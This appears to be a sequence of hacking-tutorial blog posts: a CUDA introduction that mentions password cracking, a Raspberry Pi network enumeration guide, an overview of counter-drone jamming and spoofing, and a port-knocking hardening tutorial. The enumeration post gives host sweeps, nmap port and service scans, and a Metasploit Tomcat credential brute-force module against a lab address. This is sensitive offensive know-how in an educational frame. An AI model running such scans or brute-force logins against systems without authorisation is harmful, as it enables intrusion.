  • A GPU is like a kitchen with thousands of cooks—we split the work (threads), organize them into brigades (blocks), and assign the whole team to the job (grid).

Coding With CUDA

CUDA extends C/C++ with some keywords.
Here’s the simple workflow:

  1. You write a kernel function (runs on the GPU).
  2. You call it from the host code (the CPU side).
  3. Launch thousands of threads in parallel → GPU executes them fast.

Example skeleton code:

c__global__ void add(int *a, int *b, int *c) {
    int idx = threadIdx.x;
    c[idx] = a[idx] + b[idx];
}

int main() {
    // Allocate memory on host and device
    // Copy data to GPU
    // Run kernel with N threads
    add<<<1, N>>>(dev_a, dev_b, dev_c);
    // Copy results back to host
}

The keywords:

  • __global__ → A function (kernel) run on the GPU.
  • threadIdx → Built-in variable identifying which thread you are.
  • <<<1, N>>> → Tells CUDA to launch 1 block of N threads.

This simple example adds two arrays in parallel. Imagine scaling this to millions of operations at once!

The CUDA Toolchain Setup

If you want to try CUDA make certain you have the following items:

1. an NVIDIA GPU.

2. the CUDA Toolkit (contains compiler nvcc).

3. Write your CUDA programs in C/C++ and compile it with nvcc.

Run and watch your GPU chew through problems.

To install the CUDA toolkit in Kali Linux, simply enter;

kali > sudo apt install nvidia-cuda-toolkit

Next, write your code and compile it with nvcc, such as;

kali > nvcc hackersarise.cu -o hackersarise

Practical Applications of CUDA

CUDA is already excelling at hacking and computing applications such as;

  1. Password cracking (Hashcat, John the Ripper with GPU support).
  2. AI & ML (TensorFlow/PyTorch use CUDA under the hood). Our application of using Wi-Fi to see through walls uses CUDA.
  3. Cryptanalysis (breaking encryption) & simulation tasks.
  4. Network packet analysis at high scale.

As a beginner, start with small projects—then explore how to take compute-heavy tasks and offload them to the GPU.

Summary

CUDA is NVIDIA’s way of letting you program GPUs for general-purpose computing. To the hacker or cybersecurity pro, it’s a way to supercharge computation-heavy tasks.

Learn the thread-block-grid model, write simple kernels, and then think: what problems can I solve dramatically faster if run in parallel?


Hacking with the Raspberry Pi: Network Enumeration

17 November 2025 at 10:03

Welcome back, my aspiring cyberwarriors!

We continue exploring the Raspberry Pi’s potential for hacking. In this article, we’ll dive into network enumeration.

Enumeration is the foundational step of any penetration test—it involves systematically gathering detailed information about the hosts, services, and topology of the network you’re targeting. For the purposes of this guide, we’ll assume that you already have a foothold within the network—whether through physical proximity, compromised credentials, or another form of access—allowing you to apply a range of enumeration techniques.

Let’s get started!

Step #1: Fping

To get started, we’ll examine a lightweight utility called fping. It leverages the Internet Control Message Protocol (ICMP) echo request to determine whether a target host is responding. Unlike the traditional ping command, fping lets you specify any number of targets directly on the command line—or supply a file containing a list of targets to probe. This allows us to do a basic network discovery.

Fping comes preinstalled on Kali Linux. To confirm that it’s available and view its options, you can display the help page.

kali> fping -h

To run a quiet scan, we can use the following command:

kali> sudo fping -I wlan0 -q -a -g 192.168.0.0/24

This command runs fping with root privileges to quietly scan all IP addresses in the 192.168.0.0/24 network via the wlan0 interface, showing only the IPs that respond (i.e., hosts that are alive). At this point, we can see which systems are live on the network and are ready to be exploited. At its core, fping is very lightweight; when I ran htop and fping simultaneously, I observed the following output:

As you can see, CPU usage is around 2% and less than 1% of memory usage in my case (my Pi board has 4 cores and 2GB of RAM).

Step #2: Nmap

At this point, we have identified our target and can move on to the next step — network mapping with Nmap to see which ports are open. Nmap is one of the best-known tools in the cybersecurity field, and Hackers-Arise offers a dedicated training course for mastering Nmap; you can find it after the link.

I assume you already have a basic understanding of Nmap, so we can proceed to network enumeration.

Let’s run a simple Nmap scan to check for open ports:

kali> sudo nmap -p- --open –min-rate 5000 -n -Pn 192.168.0.150 -oG open_ports

This command checks all 65,535 TCP ports and only shows the ones that are open. It uses a high scan rate for speed (5000 packets per second) and skips DNS resolution, assuming the host is up, without pinging it. Also, the results are saved in a grepable format to a file called open_ports, so we can analyze them later.

At its peak, CPU usage was around 33% and around 2% of memory usage.

As a result, we found twelve open ports and can now move on to gathering a bit more information.

kali> sudo nmap -sC -sV -p135,139,445,5040,8080,49664,49665,49666,49667,49668,49668,49669,49670

This executes Nmap’s default script set (-sC) to identify commonly known vulnerabilities in services listening on the scanned ports. Additionally, -sV was used for service version detection.

This scan revealed some important information for further exploitation. The Raspberry Pi handled it quite well. I saw a brief spike in resource usage at the start, but it remained very low afterward.

Step #3: Exploitation

Let’s assume our reconnaissance is complete and we’ve discovered that the Tomcat application may be using weak credentials. We can now launch Metasploit and attempt a brute-force login.

msf6> use scanner/http/tomcat_mgr_login
msf6> set RHOSTS 192.168.0.150
msf6> run

The Raspberry Pi struggles somewhat to start Metasploit, although running it typically causes no issues.

Summary

The Raspberry Pi is a very powerful tool for every hacker. Our tools are generally lightweight, and the resources of this small board are enough to handle most tasks. So, if your budget is limited, buy a Raspberry Pi, connect it to your TV, and start learning cybersecurity.

If you want to grow in the pentesting field, check out our CWA Preparation Course — get certified, get hired, and start your journey!

SDR (Signals Intelligence) for Hackers: Getting Started with Anti-Drone Warfare

14 November 2025 at 10:33

Welcome back, aspiring cyberwarriors!

In modern warfare, we’re dealing with a whole new battlefield—one that’s invisible to the naked eye but just as deadly as kinetic warfare. Drones, or unmanned aerial vehicles (UAVs), have completely changed the game. From small commercial quadra-copters rigged with grenades to sophisticated military platforms conducting precision strikes, these aerial threats are everywhere on today’s battlefield.

But here’s the thing: they all depend on the electromagnetic spectrum to communicate, navigate, and operate. And that’s where Electronic Warfare (EW) comes in. Specifically, we’re talking about Electronic Countermeasures (ECM) designed to jam, disrupt, or even hijack these flying threats.

In this article, we’ll dive into how this invisible war is being fought. Let’s get rolling!

Understanding Radio-Electronic Warfare

Jamming UAVs falls under what’s called Radio-Electronic Warfare. The mission is simple in concept but complex in execution: disorganize the enemy’s command and control, wreck their reconnaissance efforts, and keep our own systems running smoothly.

Within this framework, we have COMJAM (suppression of radio communication channels). This is the bread and butter of counter-drone operations—disrupting the channels that control equipment and weapons, including those UAVs.

How Jamming Actually Works

Let’s get real about how this stuff actually works. It’s really just exploiting basic radio physics and the limitations of receiver systems.

Basic Jamming Principle

The Signal-to-Noise Game

All radio communication depends on what we call the signal-to-noise ratio (SNR). For a drone to receive its control commands or GPS signals, the legitimate signal must be stronger than the background electromagnetic noise.

This follows what’s known as the “jamming equation.” Here’s what matters:

Power output. A 30-watt personal jammer might protect just you and a small group of people, while a 200-watt system can throw up an electronic dome over a much bigger area. More watts equals more range and effectiveness.

Distance relationships. Think about it—the drone operator’s control signal has to travel several kilometers to reach the drone. But if we position our jammer between them or near the drone, we’ve got a much shorter transmission path.

Antenna gain. Directional antennas focus our jamming energy like a spotlight instead of a light bulb.

Frequency selectivity means we can target specific frequency bands used by drones while leaving other communications alone.

Types of Jamming Signals

Types of Jamming Techniques


Different situations call for different jamming techniques:

Noise jamming. We just sent random radio frequency energy across the target frequencies, creating a “wall” of interference.

Tone jamming transmits continuous wave signals at specific frequencies. It’s more power-efficient for targeting narrow-band communications, but modern systems can filter this out more easily.

Pulse jamming uses intermittent bursts of energy. This can be devastating against receivers that use time-based processing, and it conserves our jammer’s power for longer operations.

Swept jamming rapidly changes frequencies across a band. If the enemy drone is frequency-hopping to avoid us, swept jamming ensures we’re hitting them somewhere, though with less power at any single frequency at any moment.

Barrage jamming simultaneously broadcasts across wide frequency ranges. It’s comprehensive coverage, but it requires serious power output.

Smart Jamming and Spoofing

The most basic jamming just drowns out signals with noise. But the most advanced systems go way beyond that, using what we call “smart jamming” or spoofing.

Smart jamming means analyzing the source signal in real-time, understanding how it works, and then replacing it with a more powerful, false signal that the target system will actually accept as legitimate.

In the context of UAV operations, this gets really sophisticated. Systems can manipulate GPS signals to provide false positioning data, making drones think they’re somewhere they’re not—that’s spoofing. Even more advanced are systems like the Shipovnik-АЕРО complex, which can actually penetrate the UAV’s onboard systems and potentially take control.

Shipovnik-АЕРО Complex

What Actually Happens When We Jam a Drone

When we successfully jam a drone, what happens depends on what we’re targeting and how the drone is programmed to respond:

Control link jamming cuts the command channel between the operator and the drone. Depending on its fail-safe programming, the drone might hover in place, automatically return to its launch point, attempt to land immediately, or continue its last programmed mission autonomously.

GPS/GNSS jamming denies the drone accurate position information. Without GPS, most commercial drones and many military ones can’t maintain stable flight or navigate to targets. Some will fall back on inertial navigation systems, but those accumulate errors over time. Others become completely disoriented and crash.

Video link jamming blinds FPV operators, forcing them to fly without visual reference. This is particularly effective against FPV kamikaze drones, which require continuous video feedback for precision targeting.

Combined jamming hits multiple systems simultaneously—control, navigation, and video—creating a comprehensive denial effect that overwhelms even drones with redundant systems.

The Arsenal of Counter-Drone Electronic Warfare Systems

The modern battlefield has an array of EW systems designed specifically for detecting and suppressing drones. These range from massive, brigade-level complexes that can throw up electronic domes over vast areas to small, portable units that individual soldiers can carry for personal protection.

Dedicated Counter-UAS (C-UAS) Systems

The AUDS (Anti-UAV Defence System) is an example of dedicated C-UAS tech. It suppresses communication channels between UAVs and their operators with suppression distances of 2-4 kilometers for small UAVs and up to 8 kilometers for medium-sized platforms. The variation in range reflects the different power levels and signal characteristics of various drone types.

AUDS

The M-LIDS (Mobile-Low, Slow, Small Unmanned Aircraft System Integrated Defeat System) takes a more comprehensive approach. This system doesn’t just jam—it combines an EW suite with a 30mm counter-drone cannon for kinetic kills and even deploys Coyote kamikaze UAVs. It’s literally using drones to fight drones.

M-LIDS

Russian Federation EW Complexes

Russian forces have invested heavily in electronic warfare, including numerous systems specifically designed for drone suppression.

The Leer-2 system offers suppression of UAV communication channels at 4 kilometers for small UAVs and up to 8 kilometers for medium platforms. The Silok system is basically a mobile variant mounted on a Kamaz chassis, with a suppression distance of 3-4 kilometers, giving tactical units mobile EW capabilities.

Leer-2

The Repellent-1 system specifically targets UAV communication channels and satellite navigation, operating in the 200-600 MHz frequency range with a suppression distance of up to 30 kilometers.

Repellent-1

Personal and Tactical-Level Counter-Drone Protection

Big systems are great for area defense, but the ubiquity of small drones has created massive demand for personal and small-unit protection. These portable devices focus on the most commonly used frequencies for commercial and modified commercial drones, providing immediate, localized protection.

The UNWAVE SHATRO represents cutting-edge personal counter-drone protection. Available in portable, wearable, and mobile versions, this system creates a protective bubble with a radius of 50-100 meters, specifically targeting guided munitions and UAVs operating in the 850-930 MHz range.

UNWAVE SHATRO

The UNWAVE BOOMBOX offers both directed protection (up to 500 meters) and omnidirectional coverage (100 meters), targeting multiple frequency bands critical to drone operations. By suppressing frequencies including 850-930 MHz, 1550-1620 MHz (GPS), 2400-2480 MHz (Wi-Fi/Control), and 5725-5850 MHz (Wi-Fi/Video), this system addresses the full spectrum of commercial drone communication and navigation systems.

UNWAVE BOOMBOX

Summary

This article examines the role of Electronic Warfare (EW) in combating unmanned aerial vehicles (UAVs), which rely on electromagnetic signals for operation. It discusses jamming techniques like noise, tone, and pulse jamming, along with advanced methods such as smart jamming and spoofing.

The invisible war for control of the electromagnetic spectrum may not capture headlines like kinetic combat, but make no mistake—it’s every bit as crucial to the outcome of modern conflicts.

Look for our Anti-Drone Warfare training in 2026!

Hacking with the Raspberry Pi: Getting Started with Port Knocking

13 November 2025 at 12:10

Welcome back, aspiring cyberwarriors!

As you are aware, traditional security approaches typically involve firewalls that either allow or deny traffic to specific ports. The problem is that allowed ports are visible to anyone running a port scan, making them targets for exploitation. Port knocking takes a different approach: all ports appear filtered (no response) to the outside world until you send a specific sequence of connection attempts to predetermined ports in the correct order. Only then does your firewall open the desired port for your IP address.

Let’s explore how this technique works!

What is Port Knocking?

Port knocking is a method of externally opening ports on a firewall by generating a connection attempt sequence to closed ports. When the correct sequence of port “knocks” is received, the firewall dynamically opens the requested port for the source IP address that sent the correct knock sequence.

The beauty of this technique is its simplicity. A daemon (typically called knockd) runs on your server and monitors firewall logs or packet captures for specific connection patterns. When it detects the correct sequence, it executes a command to modify your firewall rules, usually opening a specific port for a limited time or for your specific IP address only.

The knock sequence can be as simple as attempting connections to three ports in order, like 7000, 8000, 9000, or as complex as a lengthy sequence with timing requirements. The more complex your sequence, the harder it is for an attacker to guess or discover through brute force.

The Scenario: Securing SSH Access to Your Raspberry Pi

For this tutorial, I’ll demonstrate port knocking between a Kali Linux machine and a Raspberry Pi. This is a close to real-world scenario that many of you might use in your home lab or for remote management of IoT devices. The Raspberry Pi will run the knockd daemon and have SSH access hidden behind port knocking, while our Kali machine will perform the knocking sequence to gain access.

Step #1: Setting Up the Raspberry Pi (The Server)

Let’s start by configuring our Raspberry Pi to respond to port knocking. First, we need to install the knockd daemon:

pi> sudo apt install knockd

The configuration file for knockd is located at /etc/knockd.conf. Let’s open it.

Here’s a default configuration that is recommended for beginners. The only thing I changed -A flag to -I to insert the rule at position 1 (top) so it will be evaluated before any DROP rules.

The [openSSH] section defines our knock sequence: connections must be attempted to ports 7000, 8000, and 9000 in that exact order. The seq_timeout of 5 seconds means all three knocks must occur within 5 seconds of each other. When the correct sequence is detected, knockd executes the iptables command to allow SSH connections from your IP address.

The [closeSSH] section does the reverse: it uses the knock sequence in reverse order (9000, 8000, 7000) to close the SSH port again.

Now we need to enable knockd to start on boot:

pi> sudo vim /etc/default/knockd

Change the line START_KNOCKD=0 to START_KNOCKD=1 and make sure the network interface is set correctly.

Step #2: Configuring the Firewall

Before we start knockd, we need to configure our firewall to block SSH by default. This is critical because port knocking only works if the port is actually closed initially.

First, let’s set up basic iptables rules:

pi> sudo apt install iptables

pi> sudo iptables -A INPUT -m conntrack –ctstate ESTABLISHED,RELATED -j ACCEPT

pi> sudo iptables -A INPUT -p tcp –dport 22 -j DROP

pi> sudo iptables -A INPUT -j DROP

These rules allow established connections to continue (so your current SSH session won’t be dropped), block new SSH connections, and drop all other incoming traffic by default.

Now start the knockd daemon:

pi> sudo systemctl start knockd
pi> sudo systemctl enable knockd

Your Raspberry Pi is now configured and waiting for the secret knock! From the outside world, SSH appears with filtered access.

Step #3: Installing Knock Client on Kali Linux

Now let’s switch to our Kali Linux machine. We need to install the knock client, which is the tool we’ll use to send our port knocking sequence.

kali> sudo apt-get install knockd

The knock client is actually part of the same package as the knockd daemon, but we’ll only use the client portion on our Kali machine.

Step #4: Performing the Port Knock

Before we try to SSH to our Raspberry Pi, we need to perform our secret knock sequence. From your Kali Linux terminal, run:

kali> knock -v 192.168.0.113 7000 8000 9000

The knock client is sending TCP SYN packets to each port in sequence. These packets are being logged by the knockd daemon on your Raspberry Pi, which recognizes the pattern and opens SSH for your IP address.

Now, immediately after knocking, try to SSH to your Raspberry Pi:

If everything is configured correctly, you should connect successfully! The knockd daemon recognized your knock sequence and added a temporary iptables rule allowing your IP address to access SSH.

When you’re done with your SSH session, you can close the port again by sending the reverse knock sequence:

kali> knock -v 192.168.1.100 9000 8000 7000

Step #5: Verifying Port Knocking is Working

Let’s verify that our port knocking is actually providing security. Without performing the knock sequence first, try to SSH directly to your Raspberry Pi:

The connection should hang and eventually timeout. If you run nmap against your Raspberry Pi without knocking first, you’ll see that port 22 appears filtered:

Now perform your knock sequence and immediately scan again:

This demonstrates how port knocking makes services filtered until the correct sequence is provided.

Summary

Port knocking is a powerful technique for adding an extra layer of security to remote access services. By requiring a specific sequence of connection attempts before opening a port, it makes your services harder to detect to attackers and reduces your attack surface. But remember that port knocking should be part of a defense-in-depth strategy, not a standalone security solution.

❌
❌